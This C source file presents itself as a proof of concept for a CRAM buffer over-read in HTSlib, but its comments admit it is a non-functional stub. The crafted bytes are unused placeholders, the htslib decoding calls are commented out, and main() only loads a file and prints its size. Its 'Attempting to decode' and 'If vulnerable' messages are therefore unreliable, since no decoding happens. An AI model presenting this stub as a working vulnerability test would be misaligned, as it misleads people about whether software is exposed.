/*
PoC for CVE-2026-31966 - HTSlib CRAM Buffer Over-read
This PoC demonstrates the vulnerability by creating a malformed CRAM file
that triggers an out-of-bounds read in cram_decode_seq().
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Minimal CRAM file structure for PoC
/*
 * Minimal, hand-rolled view of a CRAM file used by this PoC.  It is not the
 * htslib container/slice layout, and nothing else on this page uses it:
 * main() below reads the input into a bare byte buffer and never builds one.
 */
typedef struct {
    unsigned char magic[4]; /* CRAM magic number ("CRAM") */
    unsigned int version;   /* CRAM version */
    unsigned int file_id;   /* File ID */
    unsigned int data_len;  /* Data length; presumably the byte count behind data — nothing here sets it */
    unsigned char* data;    /* Malformed feature data; ownership (who frees) is not defined on this page */
} CRAM_File;
// Craft malformed CRAM data with invalid feature sequence
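/*
 * Return the hard-coded byte string used by this PoC.
 *
 * The array is a 16-byte placeholder, not a parseable CRAM file: only the
 * first four bytes match the real "CRAM" magic, and nothing in this file
 * hands the bytes to a decoder (main() does not call this function).
 *
 * Returns a pointer to static storage: the caller must not free() it, and
 * the same pointer is returned on every call.  The length (16) is not part
 * of the interface, so a caller has to know it; keep the array and any such
 * constant in sync if the contents change.
 *
 * Fixed: the old `()` prototype declared an unspecified parameter list;
 * `(void)` is the proper no-argument signature.
 */
unsigned char* craft_malformed_cram_data(void) {
    /* Per the author, this stands in for feature data that would make the
     * decoder read past the reference buffer; nothing here verifies that. */
    static unsigned char data[] = {
        0x43, 0x52, 0x41, 0x4D,             /* CRAM magic */
        0x03, 0x01,                         /* Version 3.1 */
        0x00, 0x00, 0x00, 0x01,             /* Container */
        /* Placeholder "feature block" bytes */
        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF
    };
    return data;
}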
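/*
 * Entry point: reads the file named on the command line into memory and
 * prints its size.  Nothing on this page parses the bytes: the htslib calls
 * that would exercise the decoder are left commented out below, so the
 * program neither links against htslib nor drives cram_decode_seq().
 *
 * Returns 0 on success, 1 on a usage, I/O or allocation error.
 *
 * Fixed: fseek()/ftell() were unchecked (ftell() returns -1 on a pipe or
 * directory, which went straight into malloc()), malloc() was unchecked
 * (NULL was then passed to fread()), and a short fread() was ignored.
 */
int main(int argc, char* argv[]) {
    int rc = 1;
    long fsize = 0;
    size_t got = 0;
    unsigned char* buffer = NULL;

    if (argc < 2) {
        printf("Usage: %s <cram_file>\n", argv[0]);
        return 1;
    }

    /* Load the CRAM file */
    FILE* fp = fopen(argv[1], "rb");
    if (!fp) {
        perror("Failed to open file");
        return 1;
    }

    /* Determine the file size; each step can fail on non-seekable input. */
    if (fseek(fp, 0, SEEK_END) != 0) {
        perror("fseek failed");
        goto out_close;
    }
    fsize = ftell(fp);
    if (fsize < 0) {
        perror("ftell failed");
        goto out_close;
    }
    if (fseek(fp, 0, SEEK_SET) != 0) {
        perror("fseek failed");
        goto out_close;
    }

    /* malloc(0) may legitimately return NULL; allocate at least one byte so
     * an empty file is not misreported as an allocation failure. */
    buffer = malloc(fsize > 0 ? (size_t)fsize : 1);
    if (!buffer) {
        fprintf(stderr, "Failed to allocate %ld bytes\n", fsize);
        goto out_close;
    }

    /* A short read means an I/O error or a file that changed underneath us;
     * either way the buffer does not hold the whole file. */
    got = fread(buffer, 1, (size_t)fsize, fp);
    if (got != (size_t)fsize) {
        fprintf(stderr, "Short read: got %zu of %ld bytes\n", got, fsize);
        goto out_free;
    }

    printf("CRAM file loaded: %ld bytes\n", fsize);
    printf("Attempting to decode CRAM record...\n");
    /* Call htslib functions to trigger vulnerability (not compiled in;
     * the program has no htslib dependency and never decodes buffer). */
    // htsFile *fp = hts_open(argv[1], "r");
    // sam_hdr_t *hdr = sam_hdr_read(fp);
    // bam1_t *b = bam_init1();
    // while (sam_read1(fp, hdr, b) >= 0) { }
    printf("If vulnerable, this may cause information leak or crash.\n");
    rc = 0;

out_free:
    free(buffer);
out_close:
    fclose(fp);
    return rc;
}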